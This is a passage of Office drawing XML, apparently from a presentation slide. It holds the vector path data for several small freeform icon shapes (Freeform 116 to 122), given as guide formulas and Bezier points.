                      <a:pt x="83" y="17"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="60" y="72"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="72"/>
                      <a:pt x="27" y="72"/>
                      <a:pt x="27" y="72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60" y="45"/>
                      <a:pt x="60" y="45"/>
                      <a:pt x="60" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="60" y="72"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="84" y="25"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="84" y="27"/>
                      <a:pt x="82" y="29"/>
                      <a:pt x="80" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="29"/>
                      <a:pt x="76" y="27"/>
                      <a:pt x="76" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="23"/>
                      <a:pt x="78" y="21"/>
                      <a:pt x="80" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="21"/>
                      <a:pt x="84" y="23"/>
                      <a:pt x="84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1" name="Freeform 116">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51418A4C-759A-4001-85E1-5336D5A50F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64756" y="2953235"/>
                <a:ext cx="244667" cy="258367"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 69 w 76"/>
                  <a:gd name="T1" fmla="*/ 0 h 81"/>
                  <a:gd name="T2" fmla="*/ 8 w 76"/>
                  <a:gd name="T3" fmla="*/ 0 h 81"/>
                  <a:gd name="T4" fmla="*/ 0 w 76"/>
                  <a:gd name="T5" fmla="*/ 7 h 81"/>
                  <a:gd name="T6" fmla="*/ 0 w 76"/>
                  <a:gd name="T7" fmla="*/ 73 h 81"/>
                  <a:gd name="T8" fmla="*/ 8 w 76"/>
                  <a:gd name="T9" fmla="*/ 81 h 81"/>
                  <a:gd name="T10" fmla="*/ 69 w 76"/>
                  <a:gd name="T11" fmla="*/ 81 h 81"/>
                  <a:gd name="T12" fmla="*/ 76 w 76"/>
                  <a:gd name="T13" fmla="*/ 73 h 81"/>
                  <a:gd name="T14" fmla="*/ 76 w 76"/>
                  <a:gd name="T15" fmla="*/ 7 h 81"/>
                  <a:gd name="T16" fmla="*/ 69 w 76"/>
                  <a:gd name="T17" fmla="*/ 0 h 81"/>
                  <a:gd name="T18" fmla="*/ 66 w 76"/>
                  <a:gd name="T19" fmla="*/ 71 h 81"/>
                  <a:gd name="T20" fmla="*/ 11 w 76"/>
                  <a:gd name="T21" fmla="*/ 71 h 81"/>
                  <a:gd name="T22" fmla="*/ 11 w 76"/>
                  <a:gd name="T23" fmla="*/ 10 h 81"/>
                  <a:gd name="T24" fmla="*/ 66 w 76"/>
                  <a:gd name="T25" fmla="*/ 10 h 81"/>
                  <a:gd name="T26" fmla="*/ 66 w 76"/>
                  <a:gd name="T27" fmla="*/ 71 h 81"/>
                  <a:gd name="T28" fmla="*/ 21 w 76"/>
                  <a:gd name="T29" fmla="*/ 45 h 81"/>
                  <a:gd name="T30" fmla="*/ 56 w 76"/>
                  <a:gd name="T31" fmla="*/ 45 h 81"/>
                  <a:gd name="T32" fmla="*/ 56 w 76"/>
                  <a:gd name="T33" fmla="*/ 50 h 81"/>
                  <a:gd name="T34" fmla="*/ 21 w 76"/>
                  <a:gd name="T35" fmla="*/ 50 h 81"/>
                  <a:gd name="T36" fmla="*/ 21 w 76"/>
                  <a:gd name="T37" fmla="*/ 45 h 81"/>
                  <a:gd name="T38" fmla="*/ 21 w 76"/>
                  <a:gd name="T39" fmla="*/ 55 h 81"/>
                  <a:gd name="T40" fmla="*/ 56 w 76"/>
                  <a:gd name="T41" fmla="*/ 55 h 81"/>
                  <a:gd name="T42" fmla="*/ 56 w 76"/>
                  <a:gd name="T43" fmla="*/ 60 h 81"/>
                  <a:gd name="T44" fmla="*/ 21 w 76"/>
                  <a:gd name="T45" fmla="*/ 60 h 81"/>
                  <a:gd name="T46" fmla="*/ 21 w 76"/>
                  <a:gd name="T47" fmla="*/ 55 h 81"/>
                  <a:gd name="T48" fmla="*/ 26 w 76"/>
                  <a:gd name="T49" fmla="*/ 23 h 81"/>
                  <a:gd name="T50" fmla="*/ 33 w 76"/>
                  <a:gd name="T51" fmla="*/ 30 h 81"/>
                  <a:gd name="T52" fmla="*/ 41 w 76"/>
                  <a:gd name="T53" fmla="*/ 23 h 81"/>
                  <a:gd name="T54" fmla="*/ 33 w 76"/>
                  <a:gd name="T55" fmla="*/ 15 h 81"/>
                  <a:gd name="T56" fmla="*/ 26 w 76"/>
                  <a:gd name="T57" fmla="*/ 23 h 81"/>
                  <a:gd name="T58" fmla="*/ 38 w 76"/>
                  <a:gd name="T59" fmla="*/ 30 h 81"/>
                  <a:gd name="T60" fmla="*/ 28 w 76"/>
                  <a:gd name="T61" fmla="*/ 30 h 81"/>
                  <a:gd name="T62" fmla="*/ 21 w 76"/>
                  <a:gd name="T63" fmla="*/ 35 h 81"/>
                  <a:gd name="T64" fmla="*/ 21 w 76"/>
                  <a:gd name="T65" fmla="*/ 40 h 81"/>
                  <a:gd name="T66" fmla="*/ 46 w 76"/>
                  <a:gd name="T67" fmla="*/ 40 h 81"/>
                  <a:gd name="T68" fmla="*/ 46 w 76"/>
                  <a:gd name="T69" fmla="*/ 35 h 81"/>
                  <a:gd name="T70" fmla="*/ 38 w 76"/>
                  <a:gd name="T71" fmla="*/ 3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6" h="81">
                    <a:moveTo>
                      <a:pt x="69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77"/>
                      <a:pt x="4" y="81"/>
                      <a:pt x="8" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="81"/>
                      <a:pt x="69" y="81"/>
                      <a:pt x="69" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="81"/>
                      <a:pt x="76" y="77"/>
                      <a:pt x="76" y="73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6" y="3"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="69" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="66" y="71"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="71"/>
                      <a:pt x="11" y="71"/>
                      <a:pt x="11" y="7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66" y="10"/>
                      <a:pt x="66" y="10"/>
                      <a:pt x="66" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="66" y="71"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="45"/>
                    </a:move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50"/>
                      <a:pt x="56" y="50"/>
                      <a:pt x="56" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="50"/>
                      <a:pt x="21" y="50"/>
                      <a:pt x="21" y="50"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21" y="45"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="55"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="55"/>
                      <a:pt x="56" y="55"/>
                      <a:pt x="56" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="60"/>
                      <a:pt x="56" y="60"/>
                      <a:pt x="56" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="60"/>
                      <a:pt x="21" y="60"/>
                      <a:pt x="21" y="60"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21" y="55"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="26" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="27"/>
                      <a:pt x="29" y="30"/>
                      <a:pt x="33" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="30"/>
                      <a:pt x="41" y="27"/>
                      <a:pt x="41" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="18"/>
                      <a:pt x="37" y="15"/>
                      <a:pt x="33" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="15"/>
                      <a:pt x="26" y="18"/>
                      <a:pt x="26" y="23"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="38" y="30"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="30"/>
                      <a:pt x="28" y="30"/>
                      <a:pt x="28" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="30"/>
                      <a:pt x="21" y="32"/>
                      <a:pt x="21" y="35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46" y="40"/>
                      <a:pt x="46" y="40"/>
                      <a:pt x="46" y="40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6" y="32"/>
                      <a:pt x="42" y="30"/>
                      <a:pt x="38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2" name="Freeform 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{461BE94A-E7BE-4485-AD82-D049B0D3A0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83977" y="2054822"/>
                <a:ext cx="248581" cy="248580"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 67 w 127"/>
                  <a:gd name="T1" fmla="*/ 0 h 127"/>
                  <a:gd name="T2" fmla="*/ 55 w 127"/>
                  <a:gd name="T3" fmla="*/ 11 h 127"/>
                  <a:gd name="T4" fmla="*/ 67 w 127"/>
                  <a:gd name="T5" fmla="*/ 24 h 127"/>
                  <a:gd name="T6" fmla="*/ 39 w 127"/>
                  <a:gd name="T7" fmla="*/ 55 h 127"/>
                  <a:gd name="T8" fmla="*/ 11 w 127"/>
                  <a:gd name="T9" fmla="*/ 55 h 127"/>
                  <a:gd name="T10" fmla="*/ 34 w 127"/>
                  <a:gd name="T11" fmla="*/ 77 h 127"/>
                  <a:gd name="T12" fmla="*/ 0 w 127"/>
                  <a:gd name="T13" fmla="*/ 122 h 127"/>
                  <a:gd name="T14" fmla="*/ 0 w 127"/>
                  <a:gd name="T15" fmla="*/ 127 h 127"/>
                  <a:gd name="T16" fmla="*/ 4 w 127"/>
                  <a:gd name="T17" fmla="*/ 127 h 127"/>
                  <a:gd name="T18" fmla="*/ 49 w 127"/>
                  <a:gd name="T19" fmla="*/ 93 h 127"/>
                  <a:gd name="T20" fmla="*/ 71 w 127"/>
                  <a:gd name="T21" fmla="*/ 114 h 127"/>
                  <a:gd name="T22" fmla="*/ 71 w 127"/>
                  <a:gd name="T23" fmla="*/ 86 h 127"/>
                  <a:gd name="T24" fmla="*/ 102 w 127"/>
                  <a:gd name="T25" fmla="*/ 59 h 127"/>
                  <a:gd name="T26" fmla="*/ 114 w 127"/>
                  <a:gd name="T27" fmla="*/ 72 h 127"/>
                  <a:gd name="T28" fmla="*/ 127 w 127"/>
                  <a:gd name="T29" fmla="*/ 59 h 127"/>
                  <a:gd name="T30" fmla="*/ 67 w 127"/>
                  <a:gd name="T31" fmla="*/ 0 h 127"/>
                  <a:gd name="T32" fmla="*/ 55 w 127"/>
                  <a:gd name="T33" fmla="*/ 67 h 127"/>
                  <a:gd name="T34" fmla="*/ 47 w 127"/>
                  <a:gd name="T35" fmla="*/ 59 h 127"/>
                  <a:gd name="T36" fmla="*/ 75 w 127"/>
                  <a:gd name="T37" fmla="*/ 31 h 127"/>
                  <a:gd name="T38" fmla="*/ 83 w 127"/>
                  <a:gd name="T39" fmla="*/ 39 h 127"/>
                  <a:gd name="T40" fmla="*/ 55 w 127"/>
                  <a:gd name="T41" fmla="*/ 6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7">
                    <a:moveTo>
                      <a:pt x="67" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="55" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="55" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55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3" name="Freeform 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF6FE161-6B2B-4000-ADB2-3CCDFBEC5F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74366" y="1367799"/>
                <a:ext cx="246623" cy="166372"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 17 w 77"/>
                  <a:gd name="T1" fmla="*/ 19 h 52"/>
                  <a:gd name="T2" fmla="*/ 34 w 77"/>
                  <a:gd name="T3" fmla="*/ 36 h 52"/>
                  <a:gd name="T4" fmla="*/ 17 w 77"/>
                  <a:gd name="T5" fmla="*/ 52 h 52"/>
                  <a:gd name="T6" fmla="*/ 0 w 77"/>
                  <a:gd name="T7" fmla="*/ 36 h 52"/>
                  <a:gd name="T8" fmla="*/ 0 w 77"/>
                  <a:gd name="T9" fmla="*/ 33 h 52"/>
                  <a:gd name="T10" fmla="*/ 34 w 77"/>
                  <a:gd name="T11" fmla="*/ 0 h 52"/>
                  <a:gd name="T12" fmla="*/ 34 w 77"/>
                  <a:gd name="T13" fmla="*/ 9 h 52"/>
                  <a:gd name="T14" fmla="*/ 17 w 77"/>
                  <a:gd name="T15" fmla="*/ 16 h 52"/>
                  <a:gd name="T16" fmla="*/ 14 w 77"/>
                  <a:gd name="T17" fmla="*/ 19 h 52"/>
                  <a:gd name="T18" fmla="*/ 17 w 77"/>
                  <a:gd name="T19" fmla="*/ 19 h 52"/>
                  <a:gd name="T20" fmla="*/ 60 w 77"/>
                  <a:gd name="T21" fmla="*/ 19 h 52"/>
                  <a:gd name="T22" fmla="*/ 77 w 77"/>
                  <a:gd name="T23" fmla="*/ 36 h 52"/>
                  <a:gd name="T24" fmla="*/ 60 w 77"/>
                  <a:gd name="T25" fmla="*/ 52 h 52"/>
                  <a:gd name="T26" fmla="*/ 43 w 77"/>
                  <a:gd name="T27" fmla="*/ 36 h 52"/>
                  <a:gd name="T28" fmla="*/ 43 w 77"/>
                  <a:gd name="T29" fmla="*/ 33 h 52"/>
                  <a:gd name="T30" fmla="*/ 77 w 77"/>
                  <a:gd name="T31" fmla="*/ 0 h 52"/>
                  <a:gd name="T32" fmla="*/ 77 w 77"/>
                  <a:gd name="T33" fmla="*/ 9 h 52"/>
                  <a:gd name="T34" fmla="*/ 60 w 77"/>
                  <a:gd name="T35" fmla="*/ 16 h 52"/>
                  <a:gd name="T36" fmla="*/ 58 w 77"/>
                  <a:gd name="T37" fmla="*/ 19 h 52"/>
                  <a:gd name="T38" fmla="*/ 60 w 77"/>
                  <a:gd name="T39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7" h="52">
                    <a:moveTo>
                      <a:pt x="17" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="19"/>
                      <a:pt x="34" y="26"/>
                      <a:pt x="34" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="45"/>
                      <a:pt x="26" y="52"/>
                      <a:pt x="17" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="52"/>
                      <a:pt x="0" y="45"/>
                      <a:pt x="0" y="3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27" y="9"/>
                      <a:pt x="21" y="12"/>
                      <a:pt x="17" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="17"/>
                      <a:pt x="15" y="18"/>
                      <a:pt x="14" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="19"/>
                      <a:pt x="16" y="19"/>
                      <a:pt x="17" y="19"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="60" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="19"/>
                      <a:pt x="77" y="26"/>
                      <a:pt x="77" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="45"/>
                      <a:pt x="70" y="52"/>
                      <a:pt x="60" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="52"/>
                      <a:pt x="43" y="45"/>
                      <a:pt x="43" y="36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43" y="15"/>
                      <a:pt x="58" y="0"/>
                      <a:pt x="77" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="9"/>
                      <a:pt x="77" y="9"/>
                      <a:pt x="77" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="9"/>
                      <a:pt x="65" y="12"/>
                      <a:pt x="60" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="17"/>
                      <a:pt x="58" y="18"/>
                      <a:pt x="58" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="19"/>
                      <a:pt x="59" y="19"/>
                      <a:pt x="6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4" name="Freeform 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4090A1-C38D-4D9A-BE8C-B47076A17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13690" y="1782753"/>
                <a:ext cx="383636" cy="364063"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 78 w 120"/>
                  <a:gd name="T1" fmla="*/ 29 h 114"/>
                  <a:gd name="T2" fmla="*/ 83 w 120"/>
                  <a:gd name="T3" fmla="*/ 0 h 114"/>
                  <a:gd name="T4" fmla="*/ 120 w 120"/>
                  <a:gd name="T5" fmla="*/ 52 h 114"/>
                  <a:gd name="T6" fmla="*/ 68 w 120"/>
                  <a:gd name="T7" fmla="*/ 90 h 114"/>
                  <a:gd name="T8" fmla="*/ 73 w 120"/>
                  <a:gd name="T9" fmla="*/ 60 h 114"/>
                  <a:gd name="T10" fmla="*/ 27 w 120"/>
                  <a:gd name="T11" fmla="*/ 114 h 114"/>
                  <a:gd name="T12" fmla="*/ 78 w 120"/>
                  <a:gd name="T13" fmla="*/ 29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14">
                    <a:moveTo>
                      <a:pt x="78" y="29"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="0"/>
                      <a:pt x="83" y="0"/>
                      <a:pt x="83" y="0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68" y="90"/>
                      <a:pt x="68" y="90"/>
                      <a:pt x="68" y="90"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="60"/>
                      <a:pt x="73" y="60"/>
                      <a:pt x="73" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="51"/>
                      <a:pt x="18" y="88"/>
                      <a:pt x="27" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="73"/>
                      <a:pt x="16" y="18"/>
                      <a:pt x="78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5" name="Freeform 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{028199C6-E5DC-4179-BF5F-7E323EE54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5897" y="1555702"/>
                <a:ext cx="240752" cy="252495"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 123"/>
                  <a:gd name="T1" fmla="*/ 129 h 129"/>
                  <a:gd name="T2" fmla="*/ 59 w 123"/>
                  <a:gd name="T3" fmla="*/ 72 h 129"/>
                  <a:gd name="T4" fmla="*/ 0 w 123"/>
                  <a:gd name="T5" fmla="*/ 129 h 129"/>
                  <a:gd name="T6" fmla="*/ 0 w 123"/>
                  <a:gd name="T7" fmla="*/ 0 h 129"/>
                  <a:gd name="T8" fmla="*/ 59 w 123"/>
                  <a:gd name="T9" fmla="*/ 59 h 129"/>
                  <a:gd name="T10" fmla="*/ 59 w 123"/>
                  <a:gd name="T11" fmla="*/ 0 h 129"/>
                  <a:gd name="T12" fmla="*/ 123 w 123"/>
                  <a:gd name="T13" fmla="*/ 65 h 129"/>
                  <a:gd name="T14" fmla="*/ 59 w 123"/>
                  <a:gd name="T15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29">
                    <a:moveTo>
                      <a:pt x="59" y="129"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59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6" name="Freeform 121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{476A5361-48EB-41A3-A62F-922B16934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1231" y="3280109"/>
                <a:ext cx="303387" cy="303385"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 95 w 95"/>
                  <a:gd name="T1" fmla="*/ 35 h 95"/>
                  <a:gd name="T2" fmla="*/ 60 w 95"/>
                  <a:gd name="T3" fmla="*/ 35 h 95"/>
                  <a:gd name="T4" fmla="*/ 73 w 95"/>
                  <a:gd name="T5" fmla="*/ 22 h 95"/>
                  <a:gd name="T6" fmla="*/ 48 w 95"/>
                  <a:gd name="T7" fmla="*/ 12 h 95"/>
                  <a:gd name="T8" fmla="*/ 23 w 95"/>
                  <a:gd name="T9" fmla="*/ 22 h 95"/>
                  <a:gd name="T10" fmla="*/ 12 w 95"/>
                  <a:gd name="T11" fmla="*/ 47 h 95"/>
                  <a:gd name="T12" fmla="*/ 23 w 95"/>
                  <a:gd name="T13" fmla="*/ 72 h 95"/>
                  <a:gd name="T14" fmla="*/ 48 w 95"/>
                  <a:gd name="T15" fmla="*/ 83 h 95"/>
                  <a:gd name="T16" fmla="*/ 73 w 95"/>
                  <a:gd name="T17" fmla="*/ 72 h 95"/>
                  <a:gd name="T18" fmla="*/ 74 w 95"/>
                  <a:gd name="T19" fmla="*/ 71 h 95"/>
                  <a:gd name="T20" fmla="*/ 83 w 95"/>
                  <a:gd name="T21" fmla="*/ 78 h 95"/>
                  <a:gd name="T22" fmla="*/ 48 w 95"/>
                  <a:gd name="T23" fmla="*/ 95 h 95"/>
                  <a:gd name="T24" fmla="*/ 0 w 95"/>
                  <a:gd name="T25" fmla="*/ 47 h 95"/>
                  <a:gd name="T26" fmla="*/ 48 w 95"/>
                  <a:gd name="T27" fmla="*/ 0 h 95"/>
                  <a:gd name="T28" fmla="*/ 81 w 95"/>
                  <a:gd name="T29" fmla="*/ 14 h 95"/>
                  <a:gd name="T30" fmla="*/ 95 w 95"/>
                  <a:gd name="T31" fmla="*/ 0 h 95"/>
                  <a:gd name="T32" fmla="*/ 95 w 95"/>
                  <a:gd name="T33" fmla="*/ 3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5" h="95">
                    <a:moveTo>
                      <a:pt x="95" y="35"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="35"/>
                      <a:pt x="60" y="35"/>
                      <a:pt x="60" y="35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66" y="15"/>
                      <a:pt x="57" y="12"/>
                      <a:pt x="48" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="12"/>
                      <a:pt x="29" y="15"/>
                      <a:pt x="23" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="29"/>
                      <a:pt x="12" y="38"/>
                      <a:pt x="12" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="57"/>
                      <a:pt x="16" y="66"/>
                      <a:pt x="23" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="79"/>
                      <a:pt x="38" y="83"/>
                      <a:pt x="48" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="83"/>
                      <a:pt x="66" y="79"/>
                      <a:pt x="73" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="74" y="71"/>
                      <a:pt x="74" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="78"/>
                      <a:pt x="83" y="78"/>
                      <a:pt x="83" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="88"/>
                      <a:pt x="62" y="95"/>
                      <a:pt x="48" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="95"/>
                      <a:pt x="0" y="73"/>
                      <a:pt x="0" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="21"/>
                      <a:pt x="22" y="0"/>
                      <a:pt x="48" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="61" y="0"/>
                      <a:pt x="73" y="5"/>
                      <a:pt x="81" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="0"/>
                      <a:pt x="95" y="0"/>
                      <a:pt x="95" y="0"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="95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7" name="Freeform 122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35842813-DC55-4E8E-9FEF-23314B033C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12261" y="2277957"/>
                <a:ext cx="332746" cy="336661"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 86 w 104"/>
                  <a:gd name="T1" fmla="*/ 0 h 105"/>
                  <a:gd name="T2" fmla="*/ 17 w 104"/>
                  <a:gd name="T3" fmla="*/ 0 h 105"/>
                  <a:gd name="T4" fmla="*/ 0 w 104"/>
                  <a:gd name="T5" fmla="*/ 18 h 105"/>
                  <a:gd name="T6" fmla="*/ 0 w 104"/>
                  <a:gd name="T7" fmla="*/ 87 h 105"/>
                  <a:gd name="T8" fmla="*/ 17 w 104"/>
                  <a:gd name="T9" fmla="*/ 105 h 105"/>
                  <a:gd name="T10" fmla="*/ 86 w 104"/>
                  <a:gd name="T11" fmla="*/ 105 h 105"/>
                  <a:gd name="T12" fmla="*/ 104 w 104"/>
                  <a:gd name="T13" fmla="*/ 87 h 105"/>
                  <a:gd name="T14" fmla="*/ 104 w 104"/>
                  <a:gd name="T15" fmla="*/ 18 h 105"/>
                  <a:gd name="T16" fmla="*/ 86 w 104"/>
                  <a:gd name="T17" fmla="*/ 0 h 105"/>
                  <a:gd name="T18" fmla="*/ 28 w 104"/>
                  <a:gd name="T19" fmla="*/ 85 h 105"/>
                  <a:gd name="T20" fmla="*/ 19 w 104"/>
                  <a:gd name="T21" fmla="*/ 76 h 105"/>
                  <a:gd name="T22" fmla="*/ 28 w 104"/>
                  <a:gd name="T23" fmla="*/ 67 h 105"/>
                  <a:gd name="T24" fmla="*/ 37 w 104"/>
                  <a:gd name="T25" fmla="*/ 76 h 105"/>
                  <a:gd name="T26" fmla="*/ 28 w 104"/>
                  <a:gd name="T27" fmla="*/ 85 h 105"/>
                  <a:gd name="T28" fmla="*/ 50 w 104"/>
                  <a:gd name="T29" fmla="*/ 85 h 105"/>
                  <a:gd name="T30" fmla="*/ 41 w 104"/>
                  <a:gd name="T31" fmla="*/ 63 h 105"/>
                  <a:gd name="T32" fmla="*/ 19 w 104"/>
                  <a:gd name="T33" fmla="*/ 54 h 105"/>
                  <a:gd name="T34" fmla="*/ 19 w 104"/>
                  <a:gd name="T35" fmla="*/ 41 h 105"/>
                  <a:gd name="T36" fmla="*/ 63 w 104"/>
                  <a:gd name="T37" fmla="*/ 85 h 105"/>
